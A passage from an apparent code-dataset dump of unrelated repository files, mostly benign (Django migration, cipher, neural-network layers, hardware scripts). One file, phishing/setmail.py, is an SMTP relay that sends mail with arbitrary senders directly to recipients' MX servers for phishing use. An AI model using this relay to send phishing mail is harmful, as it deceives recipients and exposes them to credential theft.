return _load_config_from_dir(config_path)
# this is just a file, as we can't do a delta
# we just load it and mark all the nodes as added
valid, config = _load_and_validate_config_from_file(config_path)
if not valid:
raise RuntimeError('Invalid config')
config.compute_changes(None)
return config
|
cvat/apps/engine/migrations/0049_auto_20220202_0710.py
|
ACHultman/cvat
| 4,197 |
75663
|
# Generated by Django 3.2.11 on 2022-02-02 07:10
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('engine', '0048_auto_20211112_1918'),
]
operations = [
migrations.AlterField(
model_name='labeledshape',
name='type',
field=models.CharField(choices=[('rectangle', 'RECTANGLE'), ('polygon', 'POLYGON'), ('polyline', 'POLYLINE'), ('points', 'POINTS'), ('ellipse', 'ELLIPSE'), ('cuboid', 'CUBOID')], max_length=16),
),
migrations.AlterField(
model_name='trackedshape',
name='type',
field=models.CharField(choices=[('rectangle', 'RECTANGLE'), ('polygon', 'POLYGON'), ('polyline', 'POLYLINE'), ('points', 'POINTS'), ('ellipse', 'ELLIPSE'), ('cuboid', 'CUBOID')], max_length=16),
),
]
|
Tutorials/01. 10 Days of Statistics/002. Day 0 - Weighted Mean.py
|
Snehakri022/HackerrankPractice
| 831 |
75671
|
# Problem: https://www.hackerrank.com/challenges/s10-weighted-mean/problem
# Score: 30
n = int(input())
arr = list(map(int, input().split()))
weights = list(map(int, input().split()))
print(round(sum([arr[x]*weights[x] for x in range(len(arr))]) / sum(weights), 1))
|
propeller/paddle/data/feature_column.py
|
JZZ-NOTE/ERNIE
| 3,712 |
75696
|
# Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""FeatureColumns and many Column"""
from __future__ import print_function
from __future__ import absolute_import
from __future__ import unicode_literals
import os
import sys
import struct
from six.moves import zip, map
import itertools
import gzip
from functools import partial
import six
import logging
import numpy as np
from glob import glob
from propeller.data.feature_column import FeatureColumns as FCBase
from propeller.paddle.data.functional import Dataset
import multiprocessing
log = logging.getLogger(__name__)
__all__ = ['FeatureColumns']
class FeatureColumns(FCBase):
"""A Dataset Factory object"""
def build_dataset(self, *args, **kwargs):
"""
build `Dataset` from `data_dir` or `data_file`
if `use_gz`, will try to convert data_files to gz format and save to `gz_dir`, if `gz_dir` not given, will create one.
"""
ds = super(FeatureColumns, self).build_dataset(*args, **kwargs)
ds.__class__ = Dataset
return ds
def build_dataset_from_stdin(self, *args, **kwargs):
"""doc"""
ds = super(FeatureColumns, self).build_dataset_from_stdin(*args,
**kwargs)
ds.__class__ = Dataset
return ds
|
mealie/db/models/model_base.py
|
danielpalstra/mealie
| 1,927 |
75719
|
<reponame>danielpalstra/mealie<filename>mealie/db/models/model_base.py
import sqlalchemy.ext.declarative as dec
from requests import Session
SqlAlchemyBase = dec.declarative_base()
class BaseMixins:
def update(self, *args, **kwarg):
self.__init__(*args, **kwarg)
@classmethod
def get_ref(cls_type, session: Session, match_value: str, match_attr: str = "id"):
eff_ref = getattr(cls_type, match_attr)
return session.query(cls_type).filter(eff_ref == match_value).one_or_none()
|
test/resource/test_data/suite_tree/LibraryWithReallyTooLongName.py
|
jimpriest/sublime-robot-framework-assistant
| 103 |
75730
|
<filename>test/resource/test_data/suite_tree/LibraryWithReallyTooLongName.py
from robot.api.deco import keyword
class LibraryWithReallyTooLongName(object):
def long_name_keyword(self, *args):
"""Documentation goes here"""
print args
def other_long_name_keyword(self, *args, **kwargs):
"""Other documentation goes here"""
print args, kwargs
@keyword(name='Other Name Here')
def not_name(self, arg):
"""def not_name kw name Other Name Here"""
print arg
@keyword(name='Other ${arg1} and ${arg2} Too')
def keyword_deco(self, arg1, arg2):
"""lib keyword with emmedded args"""
print arg1, arg2
|
phishing/setmail.py
|
m00tiny/scripts
| 877 |
75741
|
<filename>phishing/setmail.py
#!/usr/bin/env python
# Copyright (c) 2012, AverageSecurityGuy
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# Neither the name of AverageSecurityGuy nor the names of its contributors may
# be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
# IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
# INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
# NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA,
# OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY
# OF SUCH DAMAGE.
import smtpd
import smtplib
import asyncore
import dns.resolver
port = 2525
debug = False
def get_mx_record(domain):
records = dns.resolver.query(domain, 'MX')
return str(records[0].exchange)
class CustomSMTPServer(smtpd.SMTPServer):
def process_message(self, peer, mailfrom, rcpttos, data):
for rcptto in rcpttos:
print '[*] Sending message to {0}.'.format(rcptto)
domain = rcptto.split('@')[1]
mx = get_mx_record(domain)
try:
server = smtplib.SMTP(mx, 25)
if debug:
server.set_debuglevel(True)
server.sendmail(mailfrom, rcptto, data)
except smtplib.SMTPDataError as e:
print '[-] {0}'.format(str(e[1]))
except smtplib.SMTPServerDisconnected as e:
print '[-] {0}'.format(str(e))
except smtplib.SMTPConnectError as e:
print '[-] {0}'.format(str(e[1]))
server = CustomSMTPServer(('127.0.0.1', port), None)
print '[+] Server listening on port {0}'.format(port)
asyncore.loop()
|
libmoon/deps/dpdk/usertools/cpu_layout.py
|
anonReview/Implementation
| 287 |
75746
|
<gh_stars>100-1000
#!/usr/bin/env python
#
# BSD LICENSE
#
# Copyright(c) 2010-2014 Intel Corporation. All rights reserved.
# Copyright(c) 2017 Cavium, Inc. All rights reserved.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Intel Corporation nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
from __future__ import print_function
import sys
try:
xrange # Python 2
except NameError:
xrange = range # Python 3
sockets = []
cores = []
core_map = {}
base_path = "/sys/devices/system/cpu"
fd = open("{}/kernel_max".format(base_path))
max_cpus = int(fd.read())
fd.close()
for cpu in xrange(max_cpus + 1):
try:
fd = open("{}/cpu{}/topology/core_id".format(base_path, cpu))
except IOError:
continue
except:
break
core = int(fd.read())
fd.close()
fd = open("{}/cpu{}/topology/physical_package_id".format(base_path, cpu))
socket = int(fd.read())
fd.close()
if core not in cores:
cores.append(core)
if socket not in sockets:
sockets.append(socket)
key = (socket, core)
if key not in core_map:
core_map[key] = []
core_map[key].append(cpu)
print(format("=" * (47 + len(base_path))))
print("Core and Socket Information (as reported by '{}')".format(base_path))
print("{}\n".format("=" * (47 + len(base_path))))
print("cores = ", cores)
print("sockets = ", sockets)
print("")
max_processor_len = len(str(len(cores) * len(sockets) * 2 - 1))
max_thread_count = len(list(core_map.values())[0])
max_core_map_len = (max_processor_len * max_thread_count) \
+ len(", ") * (max_thread_count - 1) \
+ len('[]') + len('Socket ')
max_core_id_len = len(str(max(cores)))
output = " ".ljust(max_core_id_len + len('Core '))
for s in sockets:
output += " Socket %s" % str(s).ljust(max_core_map_len - len('Socket '))
print(output)
output = " ".ljust(max_core_id_len + len('Core '))
for s in sockets:
output += " --------".ljust(max_core_map_len)
output += " "
print(output)
for c in cores:
output = "Core %s" % str(c).ljust(max_core_id_len)
for s in sockets:
if (s,c) in core_map:
output += " " + str(core_map[(s, c)]).ljust(max_core_map_len)
else:
output += " " * (max_core_map_len + 1)
print(output)
|
mmdet/core/my_mmcv/runner/hooks/mean_teacher_optimizer.py
|
Ernstsen/Pedestron
| 594 |
75750
|
<filename>mmdet/core/my_mmcv/runner/hooks/mean_teacher_optimizer.py
from torch.nn.utils import clip_grad
from mmcv.runner.hooks.hook import Hook
class OptimizerHook(Hook):
def __init__(self, grad_clip=None, mean_teacher=None):
self.grad_clip = grad_clip
self.mean_teacher = mean_teacher
def clip_grads(self, params):
clip_grad.clip_grad_norm_(
filter(lambda p: p.requires_grad, params), **self.grad_clip)
def after_train_iter(self, runner):
runner.optimizer.zero_grad()
runner.outputs['loss'].backward()
if self.grad_clip is not None:
self.clip_grads(runner.model.parameters())
runner.optimizer.step()
#mean teacher
if self.mean_teacher:
for k, v in runner.model.module.state_dict().items():
if k.find('num_batches_tracked') == -1:
runner.teacher_dict[k] = self.mean_teacher.alpha * runner.teacher_dict[k] + (1 - self.mean_teacher.alpha) * v
else:
runner.teacher_dict[k] = 1 * v
|
code/models/layers.py
|
tchittesh/EAS-
| 169 |
75772
|
<gh_stars>100-1000
from models.basic_model import BasicModel
import tensorflow as tf
import numpy as np
import copy
def apply_noise(weights, noise_config):
if noise_config is None:
return weights
noise_type = noise_config.get('type', 'normal')
if noise_type == 'normal':
ratio = noise_config.get('ratio', 1e-3)
std = np.std(weights)
noise = np.random.normal(0, std * ratio, size=weights.shape)
elif noise_type == 'uniform':
ratio = noise_config.get('ratio', 1e-3)
mean, _max = np.mean(weights), np.max(weights)
width = (_max - mean) * ratio
noise = np.random.uniform(-width, width, size=weights.shape)
else:
raise NotImplementedError
return weights + noise
def get_layer_by_name(name):
if name == 'conv':
return ConvLayer
elif name == 'fc':
return FCLayer
elif name == 'pool':
return PoolLayer
else:
raise ValueError('Unknown layer type: %s' % name)
def get_magnifier(old_size, indices):
_l = np.zeros(old_size)
for x in indices:
_l[x] += 1
magnifier = (1.0 / _l)[indices]
return magnifier
def get_random_remapping(old_size, new_size):
base = np.arange(old_size)
indices = np.concatenate([base, np.random.choice(base, new_size - old_size)])
magnifier = get_magnifier(old_size, indices)
return indices, magnifier
class BaseLayer:
"""
_id, batch normalization, activation, dropout, ready
"""
def __init__(self, _id, use_bn=True, activation='relu', keep_prob=1.0, ready=True, pre_activation=True):
self._id = _id
self.use_bn = use_bn
self.activation = activation
self.keep_prob = keep_prob
self.ready = ready
self.pre_activation = pre_activation
self._scope = None
self._init = None
self.output_op = None
@property
def id(self): return self._id
@id.setter
def id(self, value): self._id = value
@property
def init(self):
return self._init
@property
def param_initializer(self):
if self._init is None:
return None
param_initializer = {}
for key in self.variable_list.keys():
if self._init[key] is not None:
param_initializer[key] = tf.constant_initializer(self._init[key])
if len(param_initializer) == 0:
param_initializer = None
return param_initializer
def renew_init(self, net: BasicModel):
if net is None:
return copy.deepcopy(self._init)
self._init = {}
for key, var_name in self.variable_list.items():
var = net.graph.get_tensor_by_name('%s/%s' % (self._scope, var_name))
self._init[key] = net.sess.run(var)
if len(self._init) == 0:
self._init = None
return copy.deepcopy(self._init)
def copy(self):
return self.set_from_config(self.get_config(), layer_init=copy.deepcopy(self._init))
def get_config(self):
return {
'_id': self.id,
'use_bn': self.use_bn,
'activation': self.activation,
'keep_prob': self.keep_prob,
'pre_activation': self.pre_activation,
}
@property
def variable_list(self):
"""
beta: mean scale
gamma: variance scale
y = gamma * (x - moving_mean) / sqrt(epsilon + moving_variance) + beta
"""
if self.use_bn:
return {
'moving_mean': 'BatchNorm/moving_mean:0',
'moving_variance': 'BatchNorm/moving_variance:0',
'beta': 'BatchNorm/beta:0',
'gamma': 'BatchNorm/gamma:0',
}
else:
return {}
@staticmethod
def set_from_config(layer_config, layer_init):
raise NotImplementedError
def build(self, _input, net, store_output_op):
raise NotImplementedError
def prev_widen(self, indices, magnifier, noise=None):
raise NotImplementedError
def set_identity_layer(self, strict, param, noise):
raise NotImplementedError
def widen_bn(self, indices, magnifier, noise=None):
if self.use_bn:
self._init['beta'] = self._init['beta'][indices]
self._init['gamma'] = self._init['gamma'][indices]
self._init['moving_mean'] = self._init['moving_mean'][indices]
self._init['moving_variance'] = self._init['moving_variance'][indices]
def set_bn_identity(self, strict=True, param=None, noise=None):
if self.use_bn:
if strict:
self._init['moving_mean'] = param['moving_mean']
self._init['moving_variance'] = param['moving_variance']
self._init['beta'] = self._init['moving_mean']
self._init['gamma'] = np.sqrt(self._init['moving_variance'] + param['epsilon'])
else:
# use default initialization for batch normalization layer
self._init['moving_mean'], self._init['moving_variance'] = None, None
self._init['beta'], self._init['gamma'] = None, None
class ConvLayer(BaseLayer):
def __init__(self, _id, filter_num, kernel_size=3, strides=1,
use_bn=True, activation='relu', keep_prob=1.0, ready=True, pre_activation=True, **kwargs):
BaseLayer.__init__(self, _id, use_bn, activation, keep_prob, ready, pre_activation)
self.filter_num = filter_num
self.kernel_size = kernel_size
self.strides = strides
@property
def layer_str(self):
return 'C%d,%d,%d' % (self.filter_num, self.kernel_size, self.strides)
@property
def variable_list(self):
var_list = {'kernel': 'kernel:0'}
var_list.update(super(ConvLayer, self).variable_list)
return var_list
def get_config(self):
return {
'name': 'conv',
'filter_num': self.filter_num,
'kernel_size': self.kernel_size,
'strides': self.strides,
**super(ConvLayer, self).get_config(),
}
@staticmethod
def set_from_config(layer_config, layer_init=None):
conv_layer = ConvLayer(**layer_config)
conv_layer._init = layer_init
return conv_layer
def build(self, _input, net: BasicModel, store_output_op=False):
output = _input
if not self.ready:
return output
with tf.variable_scope(self._id):
self._scope = tf.get_variable_scope().name
param_initializer = self.param_initializer
if self.pre_activation:
# batch normalization
if self.use_bn:
output = BasicModel.batch_norm(output, net.is_training, net.net_config.bn_epsilon,
net.net_config.bn_decay, param_initializer=param_initializer)
# activation
output = BasicModel.activation(output, self.activation)
# convolutional
output = BasicModel.conv2d(output, self.filter_num, self.kernel_size, self.strides,
param_initializer=param_initializer)
else:
# convolutional
output = BasicModel.conv2d(output, self.filter_num, self.kernel_size, self.strides,
param_initializer=param_initializer)
# batch normalization
if self.use_bn:
output = BasicModel.batch_norm(output, net.is_training, net.net_config.bn_epsilon,
net.net_config.bn_decay, param_initializer=param_initializer)
# activation
output = BasicModel.activation(output, self.activation)
# dropout
output = BasicModel.dropout(output, self.keep_prob, net.is_training)
if store_output_op:
self.output_op = output
return output
def widen_filters(self, new_filter_num, noise=None):
"""
Increase the filter number of a conv layer while preserving the functionality
Proposed in 'Net2Net': https://arxiv.org/abs/1511.05641
"""
assert new_filter_num > self.filter_num, 'Invalid new filter number: %d' % new_filter_num
assert self._init is not None, 'Uninitialized layer'
old_size, new_size = self.filter_num, new_filter_num
indices, magnifier = get_random_remapping(old_size, new_size)
# more filters
self.filter_num = new_filter_num
new_kernel = self._init['kernel'][:, :, :, indices]
new_kernel[:, :, :, old_size:] = apply_noise(new_kernel[:, :, :, old_size:], noise.get('wider'))
self._init['kernel'] = new_kernel
if not self.pre_activation:
# widen batch norm variables if use batch norm
self.widen_bn(indices, magnifier, noise=noise)
return indices, magnifier
def prev_widen(self, indices, magnifier, noise=None):
assert self._init is not None, 'Uninitialized layer'
# rescale kernel
self._init['kernel'] = self._init['kernel'][:, :, indices, :] * magnifier.reshape([1, 1, -1, 1])
if self.pre_activation:
self.widen_bn(indices, magnifier, noise=noise)
def set_identity_layer(self, strict=True, param=None, noise=None):
self._init = {}
self.set_bn_identity(strict, param, noise=noise)
mid = self.kernel_size // 2
self._init['kernel'] = np.zeros([self.kernel_size, self.kernel_size, self.filter_num, self.filter_num])
self._init['kernel'][mid, mid] = np.eye(self.filter_num)
self._init['kernel'] = apply_noise(self._init['kernel'], noise.get('deeper'))
self.ready = True
def remap(self, indices, noise=None):
self.filter_num = len(indices)
self._init['kernel'] = self._init['kernel'][:, :, :, indices]
self._init['kernel'] = apply_noise(self._init['kernel'], noise.get('wider'))
if not self.pre_activation:
self.widen_bn(indices, None, noise=noise)
return self
class FCLayer(BaseLayer):
def __init__(self, _id, units, use_bn=True, use_bias=False, activation='relu', keep_prob=1.0, ready=True,
pre_activation=False, **kwargs):
BaseLayer.__init__(self, _id, use_bn, activation, keep_prob, ready, pre_activation)
self.units = units
self.use_bias = use_bias
@property
def layer_str(self):
return 'FC%d' % self.units
@property
def variable_list(self):
var_list = {'W': 'W:0'}
if self.use_bias:
var_list['bias'] = 'bias:0'
var_list.update(super(FCLayer, self).variable_list)
return var_list
def get_config(self):
return {
'name': 'fc',
'units': self.units,
'use_bias': self.use_bias,
**super(FCLayer, self).get_config(),
}
@staticmethod
def set_from_config(layer_config, layer_init=None):
fc_layer = FCLayer(**layer_config)
fc_layer._init = layer_init
return fc_layer
def build(self, _input, net: BasicModel, store_output_op=False):
output = _input
if not self.ready:
return output
with tf.variable_scope(self._id):
self._scope = tf.get_variable_scope().name
param_initializer = self.param_initializer
# flatten if not
output = BasicModel.flatten(output)
if self.pre_activation:
# batch normalization
if self.use_bn:
output = BasicModel.batch_norm(output, net.is_training, net.net_config.bn_epsilon,
net.net_config.bn_decay, param_initializer=param_initializer)
# activation
output = BasicModel.activation(output, self.activation)
# FC
output = BasicModel.fc_layer(output, self.units, self.use_bias, param_initializer=param_initializer)
else:
# FC
output = BasicModel.fc_layer(output, self.units, self.use_bias, param_initializer=param_initializer)
# batch normalization
if self.use_bn:
output = BasicModel.batch_norm(output, net.is_training, net.net_config.bn_epsilon,
net.net_config.bn_decay, param_initializer=param_initializer)
# activation
output = BasicModel.activation(output, self.activation)
# dropout
output = BasicModel.dropout(output, self.keep_prob, net.is_training)
if store_output_op:
self.output_op = output
return output
def widen_units(self, new_units_num, noise=None):
"""
Increase the units number of a fc layer while preserving the functionality
Proposed in 'Net2Net': https://arxiv.org/abs/1511.05641
W: [in_dim, out_units]
bias: [out_units]
"""
assert new_units_num > self.units, 'Invalid new units number: %d' % new_units_num
assert self._init is not None, 'Uninitialized layer'
old_size, new_size = self.units, new_units_num
indices, magnifier = get_random_remapping(old_size, new_size)
# more units
self._init['W'] = self._init['W'][:, indices]
self._init['W'][:, old_size:] = apply_noise(self._init['W'][:, old_size:], noise.get('wider'))
self.units = new_units_num
# widen bias variable if exist
if self.use_bias:
self._init['bias'] = self._init['bias'][indices]
self._init['bias'][old_size:] = apply_noise(self._init['bias'][old_size:], noise.get('wider'))
if not self.pre_activation:
# widen batch norm variables if use batch norm
self.widen_bn(indices, magnifier, noise=noise)
return indices, magnifier
def prev_widen(self, indices, magnifier, noise=None):
assert self._init is not None, 'Uninitialized layer'
# rescale W
self._init['W'] = self._init['W'][indices] * magnifier.reshape([-1, 1])
if self.pre_activation:
self.widen_bn(indices, magnifier, noise=noise)
def set_identity_layer(self, strict=True, param=None, noise=None):
self._init = {}
self.set_bn_identity(strict, param, noise=noise)
if self.use_bias:
self._init['bias'] = [0.0] * self.units
self._init['W'] = np.eye(self.units)
self._init['W'] = apply_noise(self._init['W'], noise.get('deeper'))
self.ready = True
def remap(self, indices, noise=None):
self.units = len(indices)
self._init['W'] = self._init['W'][:, indices]
self._init['W'] = apply_noise(self._init['W'], noise.get('wider'))
if self.use_bias:
self._init['bias'] = self._init['bias'][indices]
if not self.pre_activation:
self.widen_bn(indices, None, noise=noise)
return self
class PoolLayer(BaseLayer):
def __init__(self, _id, _type, kernel_size=2, strides=2, use_bn=False, activation=None, keep_prob=1.0,
ready=True, pre_activation=True, **kwargs):
BaseLayer.__init__(self, _id, use_bn, activation, keep_prob, ready, pre_activation)
self._type = _type
self.kernel_size = kernel_size
self.strides = strides
@property
def layer_str(self):
return 'P%d,%d' % (self.kernel_size, self.strides)
def get_config(self):
return {
'name': 'pool',
'_type': self._type,
'kernel_size': self.kernel_size,
'strides': self.strides,
**super(PoolLayer, self).get_config(),
}
@staticmethod
def set_from_config(layer_config, layer_init=None):
pool_layer = PoolLayer(**layer_config)
pool_layer._init = layer_init
return pool_layer
def build(self, _input, net: BasicModel, store_output_op=False):
output = _input
if not self.ready:
return output
with tf.variable_scope(self._id):
self._scope = tf.get_variable_scope().name
param_initializer = self.param_initializer
if self.pre_activation:
# batch normalization
if self.use_bn:
output = BasicModel.batch_norm(output, net.is_training, net.net_config.bn_epsilon,
net.net_config.bn_decay, param_initializer=param_initializer)
# activation
output = BasicModel.activation(output, self.activation)
# Pooling
if self._type == 'avg':
output = BasicModel.avg_pool(output, k=self.kernel_size, s=self.strides)
elif self._type == 'max':
output = BasicModel.max_pool(output, k=self.kernel_size, s=self.strides)
else:
raise ValueError('Do not support the pooling type: %s' % self._type)
else:
# Pooling
if self._type == 'avg':
output = BasicModel.avg_pool(output, k=self.kernel_size, s=self.strides)
elif self._type == 'max':
output = BasicModel.max_pool(output, k=self.kernel_size, s=self.strides)
else:
raise ValueError('Do not support the pooling type: %s' % self._type)
# batch normalization
if self.use_bn:
output = BasicModel.batch_norm(output, net.is_training, net.net_config.bn_epsilon,
net.net_config.bn_decay, param_initializer=param_initializer)
# activation
output = BasicModel.activation(output, self.activation)
# dropout
output = BasicModel.dropout(output, self.keep_prob, net.is_training)
if store_output_op:
self.output_op = output
return output
def set_identity_layer(self, strict=True, param=None, noise=None):
raise ValueError('Pooling layer can never be an identity layer')
def prev_widen(self, indices, magnifier, noise=None):
self.widen_bn(indices, magnifier, noise=noise)
|
pycipher/caesar.py
|
onlykood/pycipher
| 196 |
75776
|
<reponame>onlykood/pycipher
#implements Caesar substitution cipher
#Author: <NAME>
#Created: 2012-04-28
from pycipher.base import Cipher
class Caesar(Cipher):
"""The Caesar Cipher has a key consisting of an integer 1-25.
This cipher encrypts a letter according to the following equation::
c = (p + key)%26
where c is the ciphertext letter, p the plaintext letter.
For more details on the Caesar cipher, see http://www.practicalcryptography.com/ciphers/caesar-cipher/
:param key: The additive key. Allowable values are integers 0-25.
"""
def __init__(self,key=13):
self.key = key % 26
def encipher(self,string,keep_punct=False):
r"""Encipher string using Caesar cipher according to initialised key.
Example::
ciphertext = Caesar(3).encipher(plaintext)
:param string: The string to encipher.
:param keep_punct: if true, punctuation and spacing are retained. If false, it is all removed. Default is False.
:returns: The enciphered string.
"""
if not keep_punct: string = self.remove_punctuation(string)
ret = ''
for c in string:
if c.isalpha(): ret += self.i2a( self.a2i(c) + self.key )
else: ret += c
return ret
def decipher(self,string,keep_punct=False):
r"""Decipher string using Caesar cipher according to initialised key.
Example::
plaintext = Caesar(3).decipher(ciphertext)
:param string: The string to decipher.
:param keep_punct: if true, punctuation and spacing are retained. If false, it is all removed. Default is False.
:returns: The deciphered string.
"""
if not keep_punct: string = self.remove_punctuation(string)
ret = ''
for c in string:
if c.isalpha(): ret += self.i2a( self.a2i(c) - self.key )
else: ret += c
return ret
if __name__ == '__main__':
print('use "import pycipher" to access functions')
|
examples/searchlight/genre_searchlight_example.py
|
osaaso3/brainiak
| 235 |
75799
|
<reponame>osaaso3/brainiak
# The following code is designed to perform a searchlight at every voxel in the brain looking at the difference in pattern similarity between musical genres (i.e. classical and jazz). In the study where the data was obtained, subjects were required to listen to a set of 16 songs twice (two runs) in an fMRI scanner. The 16 songs consisted of 8 jazz songs and 8 classical songs. The goal of this searchlight is to find voxels that seem to represent distinct information about these different musical genres. Presumably, these voxels would be found in the auditory cortex which happens to be the most organized system in the brain for processing sound information.
import numpy as np
import time
from mpi4py import MPI
from nilearn.image import load_img
import sys
from brainiak.searchlight.searchlight import Searchlight
from scipy import stats
from scipy.sparse import random
import os
# MPI variables
comm = MPI.COMM_WORLD
rank = comm.rank
size = comm.size
# Generate random data
if rank == 0:
np.random.seed(0)
data1_rand = np.random.rand(91,109,91,16)
data2_rand = np.random.rand(91,109,91,16)
classical = np.random.rand(2600)
jazz = np.random.rand(2600)
d1_reshape = np.reshape(data1_rand,(91*109*91,16))
d2_reshape = np.reshape(data2_rand,(91*109*91,16))
a1 = load_img('a1plus_2mm.nii.gz')
a1_vec = np.reshape(a1.get_data(),(91*109*91))
a1_idx = np.nonzero(a1_vec)
for i in range(8):
d1_reshape[a1_idx[0],i] += classical
d1_reshape[a1_idx[0],i+8] += jazz
d2_reshape[a1_idx[0],i] += classical
d2_reshape[a1_idx[0],i+8] += jazz
data1 = np.reshape(d1_reshape,(91,109,91,16))
data2 = np.reshape(d2_reshape,(91,109,91,16))
# Flatten data, then zscore data, then reshape data back into MNI coordinate space
data1 = stats.zscore(np.reshape(data1,(91*109*91,16)))
data1 = np.reshape(data1,(91,109,91,16))
data2 = stats.zscore(np.reshape(data2,(91*109*91,16)))
data2 = np.reshape(data2,(91,109,91,16))
else:
data1 = None
data2 = None
# Load mask
mask_img = load_img('MNI152_T1_2mm_brain_mask.nii')
mask_img = mask_img.get_data()
# Definte function that takes the difference between within vs. between genre comparisons
def corr2_coeff(AB,msk,myrad,bcast_var):
if not np.all(msk):
return None
A,B = (AB[0], AB[1])
A = A.reshape((-1,A.shape[-1]))
B = B.reshape((-1,B.shape[-1]))
corrAB = np.corrcoef(A.T,B.T)[16:,:16]
classical_within = np.mean(corrAB[0:8,0:8])
jazz_within = np.mean(corrAB[8:16,8:16])
classJazz_between = np.mean(corrAB[8:16,0:8])
jazzClass_between = np.mean(corrAB[0:8,8:16])
within_genre = np.mean([classical_within,jazz_within])
between_genre = np.mean([classJazz_between,jazzClass_between])
diff = within_genre - between_genre
return diff
comm.Barrier()
begin_time = time.time()
comm.Barrier()
# Create and run searchlight
sl = Searchlight(sl_rad=1,max_blk_edge=5)
sl.distribute([data1,data2],mask_img)
sl.broadcast(None)
global_outputs = sl.run_searchlight(corr2_coeff)
comm.Barrier()
end_time = time.time()
comm.Barrier()
# Plot searchlight results
if rank == 0:
print('Searchlight Done: ', end_time - begin_time)
maxval = np.max(global_outputs[np.not_equal(global_outputs,None)])
minval = np.min(global_outputs[np.not_equal(global_outputs,None)])
global_outputs = np.array(global_outputs, dtype=np.float)
print(global_outputs)
# Save searchlight images
out_dir = "searchlight_images"
if not os.path.exists(out_dir):
os.makedirs(out_dir)
import matplotlib.pyplot as plt
for (cnt, img) in enumerate(global_outputs):
plt.imshow(img,vmin=minval,vmax=maxval)
plt.colorbar()
plt.savefig('searchlight_images/' + 'img' + str(cnt) + '.png')
plt.clf()
|
Adafruit_QT_Py_ESP32-S2/Storage/code.py
|
gamblor21/Adafruit_Learning_System_Guides
| 665 |
75802
|
# SPDX-FileCopyrightText: 2021 <NAME> for Adafruit Industries
# SPDX-License-Identifier: Unlicense
"""
CircuitPython Essentials Storage CP Filesystem code.py file
"""
import time
import board
import microcontroller
import neopixel
pixel = neopixel.NeoPixel(board.NEOPIXEL, 1)
try:
with open("/temperature.txt", "a") as temp_log:
while True:
# The microcontroller temperature in Celsius. Include the
# math to do the C to F conversion here, if desired.
temperature = microcontroller.cpu.temperature
# Write the temperature to the temperature.txt file every 10 seconds.
temp_log.write('{0:.2f}\n'.format(temperature))
temp_log.flush()
# Blink the NeoPixel on every write...
pixel.fill((255, 0, 0))
time.sleep(1) # ...for one second.
pixel.fill((0, 0, 0)) # Then turn it off...
time.sleep(9) # ...for the other 9 seconds.
except OSError as e: # When the filesystem is NOT writable by CircuitPython...
delay = 0.5 # ...blink the NeoPixel every half second.
if e.args[0] == 28: # If the file system is full...
delay = 0.15 # ...blink the NeoPixel every 0.15 seconds!
while True:
pixel.fill((255, 0, 0))
time.sleep(delay)
pixel.fill((0, 0, 0))
time.sleep(delay)
|
core/data/collates/collate_functions.py
|
cjy97/LibFewShot
| 471 |
75806
|
# -*- coding: utf-8 -*-
import itertools
from collections import Iterable
import torch
class GeneralCollateFunction(object):
"""A Generic `Collate_fn`.
For finetuning-train.
"""
def __init__(self, trfms, times):
"""Initialize a `GeneralCollateFunction`.
Args:
trfms (list): A list of torchvision transforms.
times (int): Specify the augment times. (0 or 1 for not to augment)
"""
super(GeneralCollateFunction, self).__init__()
self.trfms = trfms
self.times = times
def method(self, batch):
